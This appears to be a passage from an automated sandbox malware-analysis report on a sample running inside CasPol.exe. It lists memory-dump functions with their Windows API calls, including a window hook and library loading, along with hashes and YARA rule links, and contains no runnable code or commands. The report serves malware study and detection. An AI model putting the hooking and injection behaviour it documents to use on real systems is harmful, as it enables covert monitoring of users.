                                                              • Opcode Fuzzy Hash: 8f11ce4c6dd8dee989b9c6d4d027525a07bbfacd667092427a17e3dc4371d9bd
                                                              • Instruction Fuzzy Hash: 6D211AB5D002099FDB54CF99D844BDFBBF5FB88320F10842AE415A7250CBB5A944CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 064D2158 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 211 64d2158-64d21a2 213 64d21ae-64d21e0 SetWindowsHookExA 211->213 214 64d21a4-64d21ac 211->214 215 64d21e9-64d2209 213->215 216 64d21e2-64d21e8 213->216 214->213 216->215
                                                              APIs
                                                              • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 064D21D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: HookWindows
                                                              • String ID: xh
                                                              • API String ID: 2559412058-34918151
                                                              • Opcode ID: b541ee473b466bbee3bde2bf86f413e45df61c213f86eba097679f2d04e21c94
                                                              • Instruction ID: 691239147a9779c3601e1536d50ca9274b08de20c939136e739680e54a79e6c7
                                                              • Opcode Fuzzy Hash: b541ee473b466bbee3bde2bf86f413e45df61c213f86eba097679f2d04e21c94
                                                              • Instruction Fuzzy Hash: CB2127B5D002099FDB54CF9AC844BDFBBF5FB88310F10842AE419A7250CBB5AA44CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 064DC178 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 220 64dc178-64dcbd8 222 64dcbda-64dcbdd 220->222 223 64dcbe0-64dcc0f LoadLibraryExW 220->223 222->223 224 64dcc18-64dcc35 223->224 225 64dcc11-64dcc17 223->225 225->224
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,064DCB71,00000800), ref: 064DCC02
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: xh
                                                              • API String ID: 1029625771-34918151
                                                              • Opcode ID: c5227a4b055cc88435679eaa8d4341c3ff74cae21ff5cf7b0cedb0e0123e5b11
                                                              • Instruction ID: d4a3c700d824af9ea647da70c41ac0fb19bd31ab7e49d270d362ce6227b7ae23
                                                              • Opcode Fuzzy Hash: c5227a4b055cc88435679eaa8d4341c3ff74cae21ff5cf7b0cedb0e0123e5b11
                                                              • Instruction Fuzzy Hash: 641114B6D003098FDB10CF9AD884ADEFBF8EB88710F10852AD519A7600C375A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 064DCB91 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,064DCB71,00000800), ref: 064DCC02
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: xh
                                                              • API String ID: 1029625771-34918151
                                                              • Opcode ID: b564e21e581830a7153b2ea634729e1ea02898373363318241ab099e3974477b
                                                              • Instruction ID: 7548c2cd98da12945ab24e55f7b1ab91de17e292bb5556fd573516d113d01ffc
                                                              • Opcode Fuzzy Hash: b564e21e581830a7153b2ea634729e1ea02898373363318241ab099e3974477b
                                                              • Instruction Fuzzy Hash: 6F1103B6D002099FDB10CFAAD884ADFFBF8EB48750F10842AD419AB610C375A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0687E5E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0687E647
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578665147.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6870000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID: xh
                                                              • API String ID: 1890195054-34918151
                                                              • Opcode ID: 837d316bfe48a28095d1256e67865fe1dbd21f4e745c48097416c4962d37b047
                                                              • Instruction ID: 3538430edff10da9b08853fbcd720174f69203ffcb53e527c21e88954f3e2ca9
                                                              • Opcode Fuzzy Hash: 837d316bfe48a28095d1256e67865fe1dbd21f4e745c48097416c4962d37b047
                                                              • Instruction Fuzzy Hash: 5711D0B1D0061A9BCB10CF9AC944BDEFBB4AB48720F14816AD518B7640D378AA44CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0637116A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 063711D6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID: xh
                                                              • API String ID: 4139908857-34918151
                                                              • Opcode ID: cc0de88703e29f1d20fab42218f376335031fd9fbce09f8313e718153f706bab
                                                              • Instruction ID: 8e9c562292b2fcbf993f24fa6bb7967ca732ec5f5ffb6e82042a512d9414adc9
                                                              • Opcode Fuzzy Hash: cc0de88703e29f1d20fab42218f376335031fd9fbce09f8313e718153f706bab
                                                              • Instruction Fuzzy Hash: 651102B6C002098FCB20CF9AD844BDEFBF4EB88324F14852AD419B7600C379A545CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06371170 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 063711D6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID: xh
                                                              • API String ID: 4139908857-34918151
                                                              • Opcode ID: 359f8552ff91a2afe683eaabc8e131a234bab2747ff332be36d8c6db6c7ac075
                                                              • Instruction ID: f77f804aeca8a54df1c499a9e6c79416f9f6fb3a5b20e5661d0d73d7db5640b6
                                                              • Opcode Fuzzy Hash: 359f8552ff91a2afe683eaabc8e131a234bab2747ff332be36d8c6db6c7ac075
                                                              • Instruction Fuzzy Hash: CB11D2B6C002498FDB20CF9AC844BDEFBF4EB89724F14852AD459B7610C379A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06374C44 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?), ref: 0637BE97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID: xh
                                                              • API String ID: 2492992576-34918151
                                                              • Opcode ID: 1195d98d47d57bfe0f1eb9cfb52772488066eca489b64b7a22d0c4d01f9065af
                                                              • Instruction ID: cf3291f151f4a4426c60c3fd005ba3a6efee4cdb072aab163be32cb3db8f23ae
                                                              • Opcode Fuzzy Hash: 1195d98d47d57bfe0f1eb9cfb52772488066eca489b64b7a22d0c4d01f9065af
                                                              • Instruction Fuzzy Hash: 7011F5B59002498FCB60CF9AD588BDEFBF8EB48324F20845AD519B7700C379A944CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0637E1CC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 0637E7E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID: xh
                                                              • API String ID: 2538663250-34918151
                                                              • Opcode ID: bb83b8efc07666d5885ba7465b6a11cc02ec9f15ad751047f969414253d5f0ab
                                                              • Instruction ID: ee2db29d3977d1f51cbc09ebc94b5369fc829aa77f0eb8d1edf907470669924d
                                                              • Opcode Fuzzy Hash: bb83b8efc07666d5885ba7465b6a11cc02ec9f15ad751047f969414253d5f0ab
                                                              • Instruction Fuzzy Hash: 9B1103B5D003498FCB60CF9AC488BDEBBF4EB48324F20845AD459B7600C378A944CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0637BE30 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?), ref: 0637BE97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID: xh
                                                              • API String ID: 2492992576-34918151
                                                              • Opcode ID: c6857ff89a62ff330cf5a5c5495ee6cb651a13c825fbfd8af32670ad181b9a93
                                                              • Instruction ID: aff6f0f9f2f66c106536a7379856fe0cb9404472f261dd3ae58a79a57ca60a37
                                                              • Opcode Fuzzy Hash: c6857ff89a62ff330cf5a5c5495ee6cb651a13c825fbfd8af32670ad181b9a93
                                                              • Instruction Fuzzy Hash: 301106B5C002098FCB50CF9AD584BDEFBF4EB48324F20845AD519A7710C775A544CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0637E788 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 0637E7E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID: xh
                                                              • API String ID: 2538663250-34918151
                                                              • Opcode ID: 8d604bf70c61702bed89437e459d092b47f7ab28ac755760aa2e23738da6ca74
                                                              • Instruction ID: 1a8370654bf5908c9f6c4ef55f5c72cb0ab758f07b505466b4e2cea99ff245bd
                                                              • Opcode Fuzzy Hash: 8d604bf70c61702bed89437e459d092b47f7ab28ac755760aa2e23738da6ca74
                                                              • Instruction Fuzzy Hash: 181115B5D00249CFCB50CF9AD588BCEBBF4EB48324F248559D519A7600C378A544CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00EBD124 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575198224.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ebd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6d809226507fde99f9d8cf9b3e65eaae42b569944e084e64f958d206fb46a83
                                                              • Instruction ID: d936656ec45b69cf5c22e85208248031c4eada9f61159e4e2a657ea2b10562f5
                                                              • Opcode Fuzzy Hash: d6d809226507fde99f9d8cf9b3e65eaae42b569944e084e64f958d206fb46a83
                                                              • Instruction Fuzzy Hash: 892167B1508240EFDB01CF18DCC0BA7BF65FB84324F248669E8452B206D336D846D7A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00EBD4D8 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575198224.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ebd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b8e08026944035d746bc0b7183d2e13d9ba6c5569e389f9758422536e77c165e
                                                              • Instruction ID: d59691bb1271802a7c304b5c6c97fb69a0caea6aee58453339010078a80b87cb
                                                              • Opcode Fuzzy Hash: b8e08026944035d746bc0b7183d2e13d9ba6c5569e389f9758422536e77c165e
                                                              • Instruction Fuzzy Hash: B0216771508240DFCB25CF04DDC0B97BFA5FB88328F208669E8051B206D336D846DBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ECD005 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575228993.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ecd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e32cb5c6cbfe5af708e619a25606c058f844d010124a5a39e061615a43a6f01
                                                              • Instruction ID: ccf6cbf441dcb04227549247f434aa1e47546793659fe301b42c0f26bb216862
                                                              • Opcode Fuzzy Hash: 2e32cb5c6cbfe5af708e619a25606c058f844d010124a5a39e061615a43a6f01
                                                              • Instruction Fuzzy Hash: B9215E7150D7C09FD7038F24D990B11BF71AB46214F2985EBD8848F6A7C37A984ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ECD030 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575228993.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ecd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 014619529984b16784eefa604c5ad76f67bf187e3a2f1e4a7aa1ea1462ff68ae
                                                              • Instruction ID: 565a96fec51344e4888ef61c77823a1736b74f9b4a34b1550d41dd37e7da3b61
                                                              • Opcode Fuzzy Hash: 014619529984b16784eefa604c5ad76f67bf187e3a2f1e4a7aa1ea1462ff68ae
                                                              • Instruction Fuzzy Hash: 4221FF71508240AFCB11DF18DAC1F26BBA6EB84318F24CA7ED84A1A246C337D847DA61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00EBD11F Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575198224.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ebd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                              • Instruction ID: fc32ee8b2d87713e08a02adbb72f5fbfba025e92b2aaad8bba3287bb90fea063
                                                              • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                              • Instruction Fuzzy Hash: 0811E676504284CFCB16CF14D9C4B56BF71FB84324F28C6A9DC441B616C336D856CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00EBD4D3 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575198224.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ebd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                              • Instruction ID: a446e4b8bb9b2e5116a06bc6979f518825410fc8e91f8ef888b283004f53fc93
                                                              • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                              • Instruction Fuzzy Hash: 5E11E676504280CFCB16CF14D9C4B56BF71FB94328F24C6A9D8451B616C33AD856CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00EBD819 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575198224.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ebd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2fd861e18cf4fbb03d5940f489e7866efc7753eadc87823466709692ad52b933
                                                              • Instruction ID: f0424c10275202a1b65caa62fcda9dca34eabd159b8a696a7710b3a37c69b6bf
                                                              • Opcode Fuzzy Hash: 2fd861e18cf4fbb03d5940f489e7866efc7753eadc87823466709692ad52b933
                                                              • Instruction Fuzzy Hash: 9E012B7190C344AAE7154A19DC847E3BFD8EF41735F18951AED052F292D379DC40D6B1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00EBD818 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575198224.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ebd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b6aef435a9a317e37296b4a08a18680bfe14bf111ab955ba5eabee978f5cf0c
                                                              • Instruction ID: f6aabd44588616ceec7f9627de4fd13866027ff47063509845308b8c640273eb
                                                              • Opcode Fuzzy Hash: 2b6aef435a9a317e37296b4a08a18680bfe14bf111ab955ba5eabee978f5cf0c
                                                              • Instruction Fuzzy Hash: C6F0C8719043449EE7158A05CC84763FFA8EF41735F18C55AED081F282C3759844CAB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 06371760 Relevance: .3, Instructions: 315COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e1b244bfba568e238b8c4c46a29f5ef3353e4e1457cd0134664a4b55f40fd60
                                                              • Instruction ID: 5d039290acdf412bff08a0f4058fba7a6497ad194d37f8462101cf5ac91a5741
                                                              • Opcode Fuzzy Hash: 2e1b244bfba568e238b8c4c46a29f5ef3353e4e1457cd0134664a4b55f40fd60
                                                              • Instruction Fuzzy Hash: 5712D7F1412746EAE710DF66E8981893B71F74532AB904308D2B12BAD9D7BE1DCACF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 064DA5DC Relevance: .3, Instructions: 265COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1450c1159fba8441a0f5bc114cbe1f17fb27b3c272790e3e17b48705b84c3778
                                                              • Instruction ID: 2dd675040a6e80e561ba8999935065e4edbf4005fcf1684e57bea64b53b90106
                                                              • Opcode Fuzzy Hash: 1450c1159fba8441a0f5bc114cbe1f17fb27b3c272790e3e17b48705b84c3778
                                                              • Instruction Fuzzy Hash: 61A18C72E10219DFCF46DFA5C8545EEBBB2FF84300B16816AE815AB320EB35E945CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06371730 Relevance: .2, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 93c06210da9ff705ed28fd747cd2366119991979a6eec905bf15ef28e8a7060d
                                                              • Instruction ID: a0d6d34d12943f875cec8988d40b81ce0dfcf0c1254f4a2d7ed511826d4a039b
                                                              • Opcode Fuzzy Hash: 93c06210da9ff705ed28fd747cd2366119991979a6eec905bf15ef28e8a7060d
                                                              • Instruction Fuzzy Hash: 82C12BB1812746EBD710DF66E8881893B71FB85326F504309D1B16B6D8D7BE28CACF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%